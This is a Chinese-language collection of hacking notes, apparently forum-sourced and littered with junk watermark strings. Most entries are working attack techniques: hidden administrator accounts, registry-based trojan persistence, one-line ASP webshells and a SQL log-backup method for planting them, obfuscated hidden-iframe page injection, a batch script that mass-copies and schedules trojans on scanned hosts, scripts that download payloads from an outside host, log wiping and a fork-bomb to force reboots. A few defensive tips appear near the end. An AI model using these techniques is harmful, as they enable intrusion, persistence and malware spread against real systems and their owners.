一些笔记

admin

1、Xp系统修改权限防止病毒或木马等破坏系统，cmd下，
2 p; f0 d1 `4 w+ I! {0 |5 Kcacls C:\windows\system32 /G hqw20:R
思是给hqw20这个用户只能读取SYSTEM32目录，但不能进行修改或写入
0 i4 v2 B% K/ {- n- b! L- `* m4 t8 O- c恢复方法：C:\>cacls C:\windows\system32 /G hqw20:F

* _" Z* i. M* E# x2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件，运行对话框中输入Iexpress。

2 [; v5 P* k, @" T# X3、内网使用灰鸽子，肉鸡上vidcs.exe -p端口，本地VIDCS里，VIDCS服务IP 填肉鸡的IP，VIDCS服务端口，就是给肉鸡开的端口，BINDIP添自己的内网IP，BIND端口 添8000，映射端口添8000。

4、建立隐藏帐号，上次总结了用guest建立隐藏的管理员，这次再介绍一种，在cmd下建立一个ating$的用户，然后注册表下复制管理员的1F4里的F 值到ating$的F值，再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
6 H( u& `1 d" j# r% b- G9 h) C
* x; d& |3 j6 ]. q9 Y% }5、利用INF文件来修改注册表
[Version]
Signature="$CHICAGO$"
[Defaultinstall]
addREG=Ating
[Ating]
1 X+ p5 l) c4 u. t3 |+ qHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
以上代码保存为inf格式，注意没有换行符，在命令行里导入inf的命令如下：
% F/ c% Z9 R0 m* Arundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
其中HKEY_CLASSES_ROOT 简写为 HKCR，HKEY_CURRENT_USER 简写为 HKCU
HKEY_LOCAL_MACHINE 简写为 HKLM，HKEY_USERS 简写为 HKU
% n" }* C8 [4 K8 XHKEY_CURRENT_CONFIG 简写为 HKCC
0x00000000 代表的是 字符串值，0x00010001 代表的是 DWORD值
; ?' p" x# B8 r% k"1"这里代表是写入或删除注册表键值中的具体数据

7 X% B$ z% ]/ C+ T' u5 U6、关于制作穿xp2防火墙的radmin，大家一定要会，各大黑客网站都有动画,
' [3 J3 e! G( H多了一步就是在防火墙里添加个端口，然后导出其键值
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
4 v7 I  l  D  |  u2 G
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项，再在service.exe项建立一个Debugger的键（字符串值），键值填ating.exe的全路径。

3 H2 C+ I# \  m1 C, w/ h/ U( x8、将ftp.exe传到服务器用来提权，可以先把它变成ating.gif格式的再用，迷惑管理员。

8 V. s4 ^# F# I& O4 j9 p9、有时候在我们进入了网站后台，但是没有上传图片和备份等功能，得不到webshell,
可是不能白来一场，可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
& V4 A  @3 a# D# M+ \* `% N
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
2 f, p# ]0 @7 s
11、我们中了盗密码的木马后不要急于删除，一般这些木马都是把密码发到指定邮箱，我们可以用探嗅软件来找到邮箱的用户名和密码，比如安全焦点的xsniff，
# u& {6 w' g& Z用法：xsniff –pass –hide –log pass.txt
5 C1 I5 a! Z% \9 Z( i* t
) l' T" i6 O7 B* _7 P7 q12、google搜索的艺术
( d$ ?+ p0 q7 }" C搜索关键字：“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
9 _4 g; W: A7 Z9 }# B2 S; b6 B. o或“字符串的语法错误”可以找到很多sql注入漏洞。

0 x$ w' Z4 \$ Q4 @& P13、还可以搜一些木马的关键字，比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。

14、cmd中输入 nc –vv –l –p 1987
) H# p' U8 o% J8 b: I做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
8 V$ A9 q* R/ }. c$ n  w+ {7 G
5 [6 y: m* F7 F7 W# A* @15、制作T++木马，先写个ating.hta文件,内容为
; Z2 }9 c- C2 B0 e<script language="VBScript">
set wshshell=createobject ("wscript.shell" )
a=wshshell.run("你马的名称",1)
! h3 u2 w4 Q+ Y: ^6 C$ Q( Awindow.close
</script>
  t9 @  Q/ N: Z9 p再用mshta生成T++木马，命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。

1 K0 _' T! X7 v* D) k. m16、搜索栏里输入
$ s+ a$ m) ?* k) C1 w4 ~. D; X/ e* ], X关键字%'and 1=1 and '%'='
, x( _  w8 |8 Y3 t关键字%'and 1=2 and '%'='
比较不同处 可以作为注入的特征字符

17、挂马代码<html>
3 g& U) b" \5 n. B' h- A<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
</html>
& x1 U( g8 W$ q- i
& }7 q3 m8 u: _8 v, C18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
net localgroup administrators还是可以看出Guest是管理员来。
- f7 s1 N( u3 u8 t) }0 u' Y
" q- }1 a3 e1 ^0 K2 d: V9 R19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
用法: 安装： instsrv.exe 服务名称 路径
, q7 z5 ?9 c* ^2 W卸载： instsrv.exe 服务名称 REMOVE
! Z3 R6 Q# N" u7 o* d! o) u

21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
  s: m2 w% R( ^7 {8 ?5 D不能注入时要第一时间想到%5c暴库。

22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测，也就是说，他会检测文件是不是有.jpg，那么我们要是把文件改成：ating.jpg.asp试试。。由于还是ASP结尾，所以木马不会变~

23、缺少xp_cmdshell时
9 ^: b* e5 Q  H+ ?. O尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
# u: a1 N/ ?7 n, s) L假如恢复不成功,可以尝试直接加用户(针对开3389的)
declare @o int
7 v( A2 y6 }5 ?/ {& g) v- x  t% ]exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员

24.批量种植木马.bat
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
扫描地址.txt里每个主机名一行 用\\开头
4 d' }2 m  E+ I  X. u! u
25、在程序上传shell过程中，程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下： <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。

26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马

$ w/ P( e4 m$ ?5 E* @6 e27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
然后用#clear logg和#clear line vty *删除日志
0 F0 m% T" P9 z! `# f& }
3 U/ `& T5 b( u) |8 b3 N28、电脑坏了省去重新安装系统的方法
4 s) ?( K9 U; Q纯dos下执行，
6 P! Q1 E( _2 z4 R/ r1 Oxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
1 B6 @. S, V4 ?2 n; x
' u, s8 W0 @% H7 ^29、解决TCP/IP筛选 在注册表里有三处，分别是：
: K& o6 ?* v+ `2 E. E9 l2 L0 JHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
分别用
  b# g6 k) g0 f- M5 `regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- ~9 q+ I# I$ S) Zregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令来导出注册表项
/ u! ^( o4 |( n然后把三个文件里的EnableSecurityFilters"=dword:00000001，
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
9 b  W/ m# a2 U& u8 _7 j
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3

31、全手工打造开3389工具
打开记事本，编辑内容如下：
6 h1 L2 K! P' c) W9 @& G4 h/ I( Jecho [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
; C( B* Q% @; b9 C  N/ I1 R" c  J; _编辑好后存为BAT文件，上传至肉鸡，执行

$ E- }' I1 \; V* A32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马

( ?  |# h9 g& v( u33、让服务器重启
& u6 k6 U+ R) a$ M% u3 C9 o写个bat死循环:
@echo off
3 R+ d+ L9 M0 v4 \6 N:loop1
cls
start cmd.exe
goto loop1
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启

) X6 b3 ~3 V" a1 B5 `3 O/ q34、如果你登录肉鸡的3389时发现有cmd一闪而过，那你可要小心了，管理员写了个bat在监视你，
@echo off
7 `5 k2 w% G! f8 Z" I8 adate /t >c:/3389.txt
time /t >>c:/3389.txt
attrib +s +h c:/3389.bat
attrib +s +h c:/3389.txt
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
, P" r% h: ^5 u* H6 P& A& o并保存为3389.bat
3 q1 v; t$ N, X$ V7 y打开注册表找到：Userinit这个键值 在末尾加入3389.bat所在的位置，比如我放到C盘，就写：,c:/3389.bat,注意一定要加个逗号

, M0 i( J) b+ r35、有时候提不了权限的话，试试这个命令，在命令行里输入：
& N2 J4 _& W0 A( p; ^start http://www.hack520.org/muma.htm然后点执行。（muma.htm是你上传好的漏洞网页）
6 y: C9 k/ W, J/ O+ z( Z, _$ A& }  Q输入：netstat -an | find "28876" 看看是否成功绑定，如果有就telnet上去，就有了system权限，当然也可以nc连接，本地执行命令。

$ c7 s6 c) H$ l) t9 e+ `3 I36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
" a7 h9 O( V+ G8 |9 G/ ]) Jecho 你的FTP账号 >>c:\1.bat //输入账号
echo 你的FTP密码 >>c:\1.bat //输入密码
echo bin >>c:\1.bat //登入
1 ^. l' [7 Y/ t9 o2 K' g0 y( mecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
echo bye >>c:\1.bat //退出
然后执行ftp -s:c:\1.bat即可

37、修改注册表开3389两法
（1）win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
& L, [- n) T% G( S$ techo Windows Registry Editor Version 5.00 >>3389.reg
- P( \! n& p. v' ?0 Techo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
2 A3 q0 d3 q+ aecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
% P/ X/ r% H* A' m7 x% XNT\CurrentVersion\Winlogon] >>3389.reg
& p. u2 k2 Z$ t2 s5 I" w0 }4 vecho "ShutdownWithoutLogon"="0" >>3389.reg
2 j1 f( E9 e% x; c5 C2 \echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
7 ?- z, y* E2 B1 E6 N! e/ K: A  d2 d>>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
  V! Q4 u2 l) }3 b* S6 E, r>>3389.reg
/ L0 g/ B" C" \6 E" D  ]" Kecho "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
& T" q( a& W- \. o$ decho "Start"=dword:00000002 >>3389.reg
  K' e! U* q, Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
$ g+ r, L5 c& N5 Q: H# h- n* q>>3389.reg
+ d; `6 z) J& ?. B" S2 u, I7 T  n/ A; Qecho "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
+ {, m, O2 q( w- S3 p( kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- V  V3 J& t- v8 r9 N7 iServer\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( B# n0 F/ [0 S2 o4 S+ C- GServer\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件，接着regedit /s 3389.reg导入注册表。
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
（2）winxp和win2003终端开启
9 n# T' ~- \: {9 z0 P用以下ECHO代码写一个REG文件：
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server]>>3389.reg
& x2 s4 S0 W. N  D% ?; techo "fDenyTSConnections"=dword:00000000>>3389.reg
8 _. S  d  q* y4 N' E0 G* z; decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
6 n4 }: V! K0 x. b6 ~8 ^+ Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" S7 C0 `( `, d6 KServer\WinStations\RDP-Tcp]>>3389.reg
$ E. k  p5 ?1 B1 Q0 P2 Techo "PortNumber"=dword:00000d3d>>3389.reg
; B. K+ q$ {/ X9 u" e0 n然后regedit /s 3389.reg del 3389.reg
+ n( `5 J- D+ R" G3 T9 u( [XP下不论开终端还是改终端端口都不需重启
, d$ m/ v  F9 B
38、找到SA密码为空的肉鸡一定要第一时间改SA密码，防止别人和我们抢肉吃
) i$ f% K0 L& u% r7 X# |+ w用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'

39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的！
) `+ M9 H& s3 p8 C( f! c（1）数据库文件名应复杂并要有特殊字符
8 a0 D& x8 l1 D$ L/ {（2）不要把数据库名称写在conn.asp里，要用ODBC数据源
将conn.asp文档中的
DBPath = Server.MapPath("数据库.mdb")
* a8 D/ K  \% s- c* Aconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" ＆ DBPath
* h. I0 u$ f8 D' h" A6 t3 Y
修改为：conn.open "ODBC数据源名称," 然后指定数据库文件的位置
+ s8 w3 W. w3 I4 d! x（3）不放在WEB目录里
: g% V$ d% k6 U7 l8 y9 O4 |/ s5 w! z
40、登陆终端后有两个东东很危险，query.exe和tsadmin.exe要Kill掉
可以写两个bat文件
@echo off
# T& C- ?1 J' {6 Z7 _: E$ e@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
@del c:\winnt\system32\query.exe
@del %SYSTEMROOT%\system32\dllcache\query.exe
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的

5 y+ C+ |  i+ |* {: S3 X6 k7 N$ u@echo off
. v% p9 T& f3 l3 L- ^: G4 S@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
: m" m. G& m4 T* Q7 l7 ~@del c:\winnt\system32\tsadmin.exe
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
+ x! l  `* N( _* R$ f
; K! h! C3 J$ V41、映射对方盘符
telnet到他的机器上，
net share 查看有没有默认共享 如果没有，那么就接着运行
net share c$=c:
net share现在有c$
+ K5 ^6 V( |9 h) k在自己的机器上运行
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘，盘符为K

0 _, [0 g/ e. Q, N6 t42、一些很有用的老知识
& n8 |5 ?3 ^7 L6 H$ m- O6 }type c:\boot.ini ( 查看系统版本 )
net start (查看已经启动的服务)
query user ( 查看当前终端连接 )
net user ( 查看当前用户 )
  ]% p4 I4 ^% v7 W: d' y% bnet user 用户 密码/add ( 建立账号 )
net localgroup administrators 用户 /add (提升某用户为管理员)
( P3 H% ^6 B' D( z/ L1 uipconfig -all ( 查看IP什么的 )
$ d* z/ o8 f$ \5 {2 enetstat -an ( 查看当前网络状态 )
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
克隆时Administrator对应1F4
) X$ ^9 x3 N. G# V, a- M' E5 uguest对应1F5
: I0 N5 t- ~" O& t- rtsinternetuser对应3E8

# z' v5 I! g# B43、如果对方没开3389，但是装了Remote Administrator Service
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
解释：用serv-u漏洞导入自己配制好的radmin的注册表信息
" E+ u, c7 G4 g2 v先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
6 p/ r6 u, M! I' _  Q& b) ^' N: n
44、用lcx做内网端口映射，先在肉鸡上监听 lcx -listen 52 8089 (端口自定）
本地上运行映射，lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口）

45、在服务器写入vbs脚本下载指定文件（比如用nbsi利用注入漏洞写入）
- {9 Q5 v! ]) A: a5 |% Xecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
; u/ h0 p- g: d: t' \# ~! a2 j^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
# E4 b5 w  k/ X! q- kCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
+ _% }1 S/ _" S( [) _4 o, k（这是完整的一句话，其中没有换行符）
/ g6 g& k: y% O5 p# v7 s. p3 e; A然后下载:
" ?0 ~1 _4 k5 W( G- ]6 k, Wcscript down.vbs http://www.hack520.org/hack.exe hack.exe

46、一句话木马成功依赖于两个条件：
( y* W- x+ B1 P5 q, V１、服务端没有禁止adodb.Stream或FSO组件
２、权限问题：如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。

47、利用DB_OWNER权限进行手工备份一句话木马的代码：
" d' C* Z8 Z7 L;alter database utsz set RECOVERY FULL--
9 t6 W" B& S0 ~* }5 p2 V;create table cmd (a image)--
$ V% h" O/ L: a. H* @2 M;backup log utsz to disk = 'D:\cmd' with init--
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
; y) u5 I4 E: D注：0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。

8 p6 B  w: X, I; B' y# G48、tlntadmn是telnet服务的设置命令，可以对telnet服务的端口、认证方式等进行设置：

用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
% F0 r3 Y! K; T0 P4 o: E' K所有会话用 'all'。
/ m- b( h# |3 t1 ?4 f" ?8 _-s sessionid 列出会话的信息。
# I" t( ?7 a/ h8 z" X0 t4 u-k sessionid 终止会话。
) Q7 a7 T2 y' i  {2 W1 P-m sessionid 发送消息到会话。
  E5 d+ x5 Q: \8 M1 l6 W' G8 Y( z+ _
config 配置 telnet 服务器参数。

common_options 为:
-u user 指定要使用其凭据的用户
0 f5 f3 s6 a6 E- c! x-p password 用户密码
/ Q0 \/ v5 R$ N& s7 x2 @+ w
; E2 b5 ?. u, A9 y0 D* R9 t6 aconfig_options 为:
dom = domain 设定用户的默认域
$ O/ T% G* Y- G" \" k( z9 E$ Wctrlakeymap = yes|no 设定 ALT 键的映射
timeout = hh:mm:ss 设定空闲会话超时值
timeoutactive = yes|no 启用空闲会话。
maxfail = attempts 设定断开前失败的登录企图数。
. O% K) H: U$ L9 e9 M5 Amaxconn = connections 设定最大连接数。
port = number 设定 telnet 端口。
4 }6 Y( k: T/ e- T7 s. z6 g9 Rsec = [+/-]NTLM [+/-]passwd
设定身份验证机构
! a( U& r9 ^9 ~9 Cfname = file 指定审计文件名。
$ E$ O  _( g6 L! L1 {fsize = size 指定审计文件的最大尺寸(MB)。
  Z8 @9 |) t+ K+ kmode = console|stream 指定操作模式。
auditlocation = eventlog|file|both
1 O7 f$ o) a/ k2 {" C3 M! a指定记录地点
5 V5 F% F. K4 w" o( Naudit = [+/-]user [+/-]fail [+/-]admin
- M" [6 `& |: o! C8 D/ d
# I7 `# ]9 `8 b8 ^49、例如:在IE上访问:
+ |8 S) y' m2 ]+ ywww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
+ i  S, j8 v% z! e- i8 `hack.txt里面的代码是：
+ _: |5 Q9 ?( m  b% ^<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
把这个hack.txt发到你空间就可以了！
这个可以利用来做网马哦！

- p% `3 v: E# m1 B3 B1 W50、autorun的病毒可以通过手动限制！
1，养成好习惯，插入U盘或移动硬盘，都要按住shift让其禁止自动运行！
2，打开盘符用右键打开！切忌双击盘符～
3，可以利用rar软件查看根目录下autorun病毒并删除之！他可以处理一些连右键都无法打开的分区！

% t# E$ s' }6 C- |51、log备份时的一句话木马：
; {& Z* |- s5 za).<%%25Execute(request("go"))%%25>
b).<%Execute(request("go"))%>
$ J+ y5 j6 x. _7 M4 u# Mc).%><%execute request("go")%><%
$ f: W- l' g3 k8 p# w8 ]- G0 X7 Zd).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%25Execute(request("l"))%25>
f).<%if request("cmd")<>"" then execute request("pass")%>
% G# W# J2 B$ i7 X2 t( W
52、at "12:17" /interactive cmd
执行后可以用AT命令查看新加的任务
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。

53、隐藏ASP后门的两种方法
1、建立非标准目录：mkdir images..\
  L* ]( J! _. R% A- c拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
/ D6 O' X% d6 k% b* u通过web访问ASP木马：http://ip/images../news.asp?action=login
如何删除非标准目录：rmdir images..\ /s
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的:
mkdir programme.asp
+ \0 u9 h5 i9 N4 S) t新建1.txt文件内容：<!--#include file=”12.jpg”-->
新建12.jpg文件内容：<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
attrib +H +S programme.asp
通过web访问ASP一句话木马：http://ip/images/programme.asp/1.txt
' r7 C) w8 {* J3 r% L0 r5 ^, n
54、attrib /d /s c:\windows +h +s，后windows目录变为隐藏＋系统，隐藏属性为灰不可更改，windows目录下面的文件和目录并没有继承属性，原来是什么样还是什么样。
9 @: s% x; J7 G然后在利用attrib /d /s c:\windows -h -s，windows目录可以显示，隐藏属性可以再次选中。

. Q* u1 o, M2 [: `4 F, Y: a55、JS隐蔽挂马
/ s8 L9 Q2 A5 n9 i1.
var tr4c3="<iframe src=ht";
tr4c3 = tr4c3+"tp:/";
. d4 S+ o7 }  v9 x% qtr4c3 = tr4c3+"/ww";
tr4c3 = tr4c3+"w.tr4";
tr4c3 = tr4c3+"c3.com/inc/m";
5 u0 c/ h2 d; A* N( [tr4c3 = tr4c3+"m.htm style="display:none"></i";
tr4c3 =tr4c3+"frame>'";
document.write(tr4c3);
) z- [! ?* k3 x9 Q避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些，混淆度增加。

0 S* V7 a) t; K- P4 p# N& M2.
转换进制，然后用EVAL执行。如
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
$ x" N' Y4 a1 E不过这个有点显眼。
3.
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
最后一点，别忘了把文件的时间也修改下。
: a! N$ F3 H) x9 C' d
4 b* @1 E& M6 K* h56.3389终端入侵常用DOS命令
2 M9 C, _  Z% A7 Gtaskkill taskkill /PID 1248 /t

4 T7 w: g+ f3 R7 Gtasklist 查进程
: d& C3 D% M8 d/ S8 S% k: i0 L
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
) }: S0 R% }7 t! J+ Siisreset /reboot
tsshutdn /reboot /delay:1    重起服务器
, e  ^% g9 u# X* @; V
; y( J+ s; [* b" b$ elogoff 12 要使用会话 ID（例如，会话 12）从会话中注销用户，

! j7 ~: r* A7 R* t; H3 W' m, nquery user 查看当前终端用户在线情况
9 j# ?0 @& d( S. i* |/ A
/ Z9 M- o. Y' ~! n( B要显示有关所有会话使用的进程的信息，请键入：query process *
) d+ P. H6 c- l( E1 i
要显示有关会话 ID 2 使用的进程的信息，请键入：query process /ID:2

$ x4 _  t5 a- T% [要显示有关服务器 SERVER2 上所有活动会话的信息，请键入：query session /server:SERVER2

要显示有关当前会话 MODEM02 的信息，请键入：query session MODEM02

( z- R% h) `& c4 V命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启

: `5 X2 d  {% m7 o  p7 Z$ d/ h命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
) ^0 {- _/ m5 A$ \. v2 ?
# W- o6 q* b3 b* O/ p命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
, V1 h4 L+ R" ^1 ~8 r; a
" }" Z9 j+ N5 m2 d命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
+ G  R( |$ Z& {3 m* ?: }0 y
' u  m' G3 y: \: n56、在地址栏或按Ctrl+O，输入：
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
7 x) t7 T5 E% S* C( W/ t
源代码就出来了。不论加密如何复杂，最终都要还原成浏览器可以解析的html代码，而documentElement.outerHTML正是最终的结果。
, C/ z  D" |6 g# a
57、net user的时候，是不能显示加$的用户，但是如果不处理的话，
用net localgroup administrators是可以看到管理组下，加了$的用户的。
" g# T1 M' q7 c8 b- F
& j  ^# x# _9 b( c) {58、 sa弱口令相关命令
- ]# I. n+ n8 X2 P1 F* F
一.更改sa口令方法：
+ G$ z' v) Q( ^' x' E5 e2 ~用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'20001001','sa'
(提示：慎用!)
* o( D* S) a0 Z. }0 e2 ~2 \
/ j+ ]9 m; f0 z" O0 e  k5 [' G二.简单修补sa弱口令.

方法1:查询分离器连接后执行：
if exists (select * from
8 j1 q/ f: r, ?$ gdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
/ Q. X3 {2 M+ [; IOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
& w3 `5 P$ x4 P$ \% N8 g
" H6 Q# R) R0 [. h& cexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

GO

; u8 q" w, O' H0 C5 I$ G然后按F5键命令执行完毕

5 r& ]$ u. t. v# p; D方法2:查询分离器连接后
第一步执行：use master
3 S0 ~& m: E! e2 C0 y+ u) n, J第二步执行：sp_dropextendedproc 'xp_cmdshell'
. g9 R2 e$ `4 d9 q0 {然后按F5键命令执行完毕
% Q! R& y' B$ }  T5 B! s
' x" U. s5 u% p4 T( M  r. _' U
- e, E! H* ]5 K) U三.常见情况恢复执行xp_cmdshell.

0 N" C" V" B3 c# {* f! |; q$ j) e( ^6 B
8 z5 e+ v  b# E. C7 L1 未能找到存储过程'master..xpcmdshell'.
' j& i) F( a, ]* V' g/ J4 C   恢复方法：查询分离器连接后,
" ]* y8 f" \( n( w. y9 P# V# e第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
9 x+ x( f- D; X& M4 a第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕
  P' q/ h8 c9 q1 L
  y+ y% X, Q' X$ O- P8 k8 U8 l  D: e2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）
# F9 x! P5 G8 }3 v+ z) }恢复方法：查询分离器连接后,
  {7 t8 K: r9 S第一步执行：sp_dropextendedproc "xp_cmdshell"
第二步执行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
# h' \+ T& h& W然后按F5键命令执行完毕
4 y% L' R2 @$ H6 X- J- ^
